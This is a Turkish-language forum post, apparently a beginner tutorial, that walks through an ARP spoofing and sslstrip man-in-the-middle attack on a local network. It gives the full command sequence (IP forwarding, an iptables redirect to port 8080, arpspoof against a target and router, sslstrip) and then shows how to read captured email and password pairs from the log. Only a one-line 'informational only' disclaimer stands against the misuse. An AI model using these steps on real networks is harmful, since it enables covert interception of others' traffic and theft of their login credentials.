Merhaba dostlar bu forumdaki ilk konumu paylaşıyorum umarım beğenirsiniz.
Arp Spoofing saldırısı nedir?
yerel ağdaki hedefin Arp tablosunu üzerimize alarak bütün trafiği dinlemek ve hedefin bilgilerini ele geçirmektir
Sslstrip nedir?
Normalde hedefin ağ trafiğini dinlerken https protokolünü kullanan sitelerde kullanıcı adı, şifre gibi bilgilerini göremeyiz. Sslstrip de hedefin girdiği https protokolünü kullanan domainleri http yaparak dinlemeye uygun hale getirir.
Şimdi harekete geçelim
İlk olarak kali linux veya parrot os üzerinden terminali açarak aşağıdaki komutu yazıyoruz
Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
Bu sayede ip yönlendirmesini sağlamış oluyoruz.
Daha sonra http trafiğinin sslstrip'in dinleme yapmış olduğu porta yönlendirmemiz gerekiyor.
Kod:
iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables = Linux üzerinde gelen firewall
-t nat = Nat olarak belirliyoruz
-A PREROUTING = Yönlendirme olduğunu belirliyoruz
-i eth0 = Ağ kartımızı seçiyoruz
-p tcp = Protokolü belirliyoruz
--destination-port 80 = Yönlendirilecek portu (hedefi) belirliyoruz
-j REDIRECT --to-port = Yönlenecek portu belirliyoruz ( Artık 80 portundan gelen verirler 8080 protuna yönlendirilecek)
Daha sonra hedef ip'den router'a Arp isteği göndereceğiz
Kod:
arpspoof -i eth0 -t hedefip(örnek:192.168.134.144) routerip(örnek:192.168.109.2)
Son olarak sslstrip'i araya sokuyoruz
Kod:
sslstrip -l 8080
Bu komutu girdiğinizde terminalde hedef giriş yaptığında loglar düşmeye başlayacaktir ve son işlemimizi yapma vaktimiz geldi demektir
Son olarak log dosyasını okuyarak bilgieri elde etmemiz gerekiyor. Log dosyasını aşağıdaki komutla açabiliriz.
Kod:
cat sslstrip.log
Bu komutu girdiğimizde logların arasında şu tarz bir şey çıkacaktır "email=
[email protected] pass=123456" Buradaki email zaten bilgidğiniz email adresi pass ise şifredir.
Kötüye kullanmayınız bu tamamen bilgilendirme amaçlı bir makaledir.
(Not: bazı kısımlar alıntıdır)
